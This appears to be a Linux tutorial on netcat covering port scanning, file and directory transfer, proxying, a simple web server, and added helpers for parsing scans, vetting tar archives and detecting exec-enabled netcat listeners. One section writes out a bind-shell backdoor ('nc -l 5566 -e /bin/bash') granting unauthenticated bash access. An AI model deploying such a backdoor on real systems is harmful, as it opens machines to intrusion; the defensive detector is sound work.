This comprehensive Linux guide expects you to run the following commands as the root user. If you run them as a different user, ensure that the user has sudo access and precede each privileged command with sudo.

netcat is a feature-packed networking utility which reads and writes data across networks from the command line. netcat was written for the Nmap Project and is the culmination of the currently splintered family of Netcat incarnations.

It works like the cat command, but for the network: it reads or writes data from/to the network using the TCP and UDP protocols. It is one of the most powerful networking tools available to Linux users and is often called the Swiss Army Knife of networking tools. It is most often used by networking specialists to monitor, test and send data across a network.

In this tutorial, we will show you the use of the netcat command with multiple examples.

Installing netcat Command

To install the netcat command on your Linux machine, run the command for your distribution.

On Debian Based Systems

$ apt install netcat

On Red-Hat Based Systems Or CentOS

$ yum install nmap-ncat

General Syntax

The general syntax of the netcat command is:

$ netcat [options] host port
OR
$ ncat [options] host port
OR
$ nc [options] host port

Using netcat For Port Scanning

netcat is most commonly used for port scanning. You can scan a single port, multiple ports or a range of ports. Use the option -z to scan for open ports without sending any data and the option -v to get more detailed output.

$ nc -z -v 155.138.206.18 80

Warning: forward host lookup failed for 155.138.206.18.vultr.com: No address associated with name
155.138.206.18.vultr.com [155.138.206.18] 80 (http) open

If you want to display only the open ports, you can filter the output through the grep command. netcat writes its verbose messages to standard error, so redirect that to standard output (2>&1) before the pipe:

$ nc -z -v 155.138.206.18 80-300 2>&1 | grep succeeded
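The word to match depends on the netcat variant: traditional netcat reports a port as "open" (as in the output shown earlier), while OpenBSD netcat prints "succeeded!". The following is an added example, not part of the original guide, that extracts the open port numbers from either style; the function name open_ports and the sample text are constructed for illustration.

```shell
# Added example. open_ports is a hypothetical helper name.
# Reads "nc -z -v" output on stdin and prints each open port once, in order.
open_ports() {
    awk '
        # Traditional netcat: "host [ip] 80 (http) open"
        NF >= 3 && $NF == "open" && $(NF-2) ~ /^[0-9]+$/ {
            print $(NF-2); next
        }
        # OpenBSD netcat: "Connection to host 80 port [tcp/http] succeeded!"
        $NF == "succeeded!" {
            for (i = 2; i <= NF; i++)
                if ($i == "port" && $(i-1) ~ /^[0-9]+$/) {
                    print $(i-1); break
                }
        }
    ' | sort -n -u
}

# Constructed sample mixing both output styles plus lines to be ignored.
SAMPLE_SCAN='Warning: forward host lookup failed for 155.138.206.18.vultr.com: No address associated with name
155.138.206.18.vultr.com [155.138.206.18] 80 (http) open
Connection to 155.138.206.18 22 port [tcp/ssh] succeeded!
nc: connect to 155.138.206.18 port 23 (tcp) failed: Connection refused
(UNKNOWN) [192.168.100.1] 194 (irc) open'

# Real use: nc -z -v 155.138.206.18 80-300 2>&1 | open_ports
printf '%s\n' "$SAMPLE_SCAN" | open_ports
```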

Listening To Inbound Connections

You can also use this command to listen for inbound connections to your system by using the option -l with a specific port to listen on.

$ nc -l port

$ nc -l 8080

Connecting To A System Remotely

You can connect to another system remotely using this command. Run the command like below:

$ nc IP_Address Port

$ nc 192.168.1.1 80

Checking Server Software And Its Version

You can also use the netcat command to find the server software and its version by sending the “EXIT” command to the server on the default SSH port 22, like below:

$ echo "EXIT" | nc 155.138.206.18 22

SSH-2.0-OpenSSH_7.4p1 Debian-10+deb9u6
Protocol mismatch.

Chatting With A Remote System

You can also use netcat command to make a chat system between one host and another. First, you need to set up a host to listen through a specific port. Then you need to connect to that host using that port on your system.

From Server side

$ nc -l 4444

From Client Side

$ nc server-IP 4444

Replace “server-IP” with the IP of the host that is listening for an inbound connection.

Once the connection is established, you can start sending messages to the server. Those messages will be displayed on the terminal of the server.

Sending/Receiving Files

You can also use netcat command to send or receive files from one host to another. For this, you first need to start the listener on the system on which the file is to be received.

$ nc -l 4444 > file.txt

Now you can send the file from the other host to this port by running the command like this:

$ nc host-IP 4444 < file.txt

Replace the “host-IP” with the IP of the host that is listening for the file to be received.

Sending/Receiving Directory

If you want to send a directory using the netcat command, you first need to make an archive of that directory using the tar command and then send it over using the netcat command.

$ tar czvf - /path/to/directory | nc host-IP 4444

Then you can receive the archive and extract it using a command like this:

$ nc -l 4444 | tar xzvf -
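The receiving pipeline extracts whatever the first peer to connect sends, so it is worth saving the stream and checking the member names before extracting. The following is an added example, not part of the original guide; the names unsafe_members, extract_checked, incoming.tgz and ./received are assumptions chosen for illustration.

```shell
# Added example. Function and file names are hypothetical.

# Print member names that are absolute or contain a ".." path component.
unsafe_members() {
    grep -E '^/|(^|/)\.\.(/|$)' || true
}

# List the archive first; extract into destdir only if every name is safe.
extract_checked() {
    archive=$1
    destdir=$2
    names=$(tar tzf "$archive") || return 2      # not a readable gzip tar
    bad=$(printf '%s\n' "$names" | unsafe_members)
    if [ -n "$bad" ]; then
        printf 'refusing to extract, unsafe member(s):\n%s\n' "$bad" >&2
        return 1
    fi
    mkdir -p "$destdir" && tar xzf "$archive" -C "$destdir"
}

# Receiver side, in place of "nc -l 4444 | tar xzvf -":
#   nc -l 4444 > incoming.tgz && extract_checked incoming.tgz ./received

# Constructed member listing: only the second and third names are unsafe.
printf '%s\n' 'site/index.html' '../outside.txt' '/abs/file' | unsafe_members
```

The name check does not cover symlink members, so extract into an empty, dedicated directory as an unprivileged user.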

Using netcat As Proxy

You can also use the netcat command as a proxy for your system.

$ nc -l 4444 | nc 192.168.100.1 40

Now all the connections coming to our server on port 4444 will be automatically redirected to the 192.168.100.1 server on port 40. But since we are using a pipe, data can only be transferred in one direction. To be able to receive the data back, we need to create a two-way pipe. Use the following commands to do so:

$ mkfifo 2way
$ nc -l 4444 0<2way | nc 192.168.100.1 40 1>2way

After this command, you will be able to send and receive data over the proxy.

Using UDP Ports

If you want to scan UDP ports, you can just add the option -u to the command:

$ nc -u -z -v 192.168.100.1 80-200

192.168.100.1: inverse host lookup failed: Unknown host
(UNKNOWN) [192.168.100.1] 200 (?) open
(UNKNOWN) [192.168.100.1] 199 (smux) open
(UNKNOWN) [192.168.100.1] 198 (?) open
(UNKNOWN) [192.168.100.1] 197 (?) open
(UNKNOWN) [192.168.100.1] 196 (?) open
(UNKNOWN) [192.168.100.1] 195 (?) open
(UNKNOWN) [192.168.100.1] 194 (irc) open

Similarly, you can add this option to any netcat command to implement it on the UDP ports.

Creating A Backdoor Using netcat Command

You can also use the netcat command to create a backdoor. This functionality is mostly used by hackers. You can run the command like this:

$ nc -l 5566 -e /bin/bash

The -e flag attaches bash to port 5566. Any client that can reach port 5566 on the server then has complete access to the system through bash, with no authentication, by running the command like this:

$ nc 192.168.100.1 5566
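To find listeners like this on your own hosts, review the process list for netcat started with a program-execution option. The following is an added example, not part of the original guide; flag_exec_netcat is a hypothetical helper and the process listing is constructed. It matches on binary name and arguments only, so treat hits as a starting point for triage (in some netcat variants -e and -c have other meanings).

```shell
# Added example. flag_exec_netcat is a hypothetical helper name.
# Reads "ps -eo pid,args" output on stdin and prints the lines where a netcat
# binary was started with a program-execution option.
flag_exec_netcat() {
    awk '
    {
        # Field 1 is the PID, field 2 the executable, the rest its arguments.
        n = split($2, part, "/"); exe = part[n]
        if (exe !~ /^(nc|ncat|netcat|nc\.openbsd|nc\.traditional)$/) next
        for (i = 3; i <= NF; i++) {
            # Long forms used by Ncat: --exec, --sh-exec (also with "=value").
            if ($i ~ /^--(sh-)?exec(=|$)/) { print; next }
            # Short forms -e / -c, alone or inside a cluster such as -lvpe.
            if ($i ~ /^-[A-Za-z0-9]*[ec]/) { print; next }
        }
    }'
}

# Constructed process listing for illustration.
SAMPLE_PS='  PID COMMAND
  812 /usr/sbin/sshd -D
 1490 nc -l 5566 -e /bin/bash
 1502 nc -l -k 4444
 1777 /usr/bin/ncat -l 5566 --exec /bin/bash
 2040 grep -e nc /var/log/syslog
 2101 nc -lvp 8080'

# Real use: ps -eo pid,args | flag_exec_netcat
printf '%s\n' "$SAMPLE_PS" | flag_exec_netcat
```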

Running A Web Server With A Static Page Using netcat

You can also start a web server using the netcat command on a local host that serves a static web page “sample.html”.

First, make a new file with the name “sample.html” and copy the following code into the file.

<html>
        <head>
                <title>Test Page</title>
        </head>
        <body>
                <h1>Level 1 header</h1>
                <h2>Subheading</h2>
                <p>Normal text here</p>
        </body>
</html>

Then run the following command:

$ while true; do sudo nc -lp 80 < sample.html; done

After this, you can access the page by going to “http://server-IP.com/sample.html”.

Setting The Connection Timeout

If we run the command in the listener mode, it will continue infinitely and will have to be terminated manually. But we can set up a timeout for a connection by using the option -w with the netcat command.

$ nc -w 10 192.168.100.1 4444

Making The Server Persistent

The server terminates automatically when the client disconnects from it. To make the server keep listening for more connections after a client disconnects, use the option -k with the netcat command.

$ nc -l -k 4444

Performing HTTP Request

You can also use this command to send various HTTP requests to a remote server.

For example, if you want to retrieve the netcat man page from the OpenBSD web site, run this command:

$ printf "GET /nc.1 HTTP/1.1\r\nHost: man.openbsd.org\r\n\r\n" | nc man.openbsd.org 80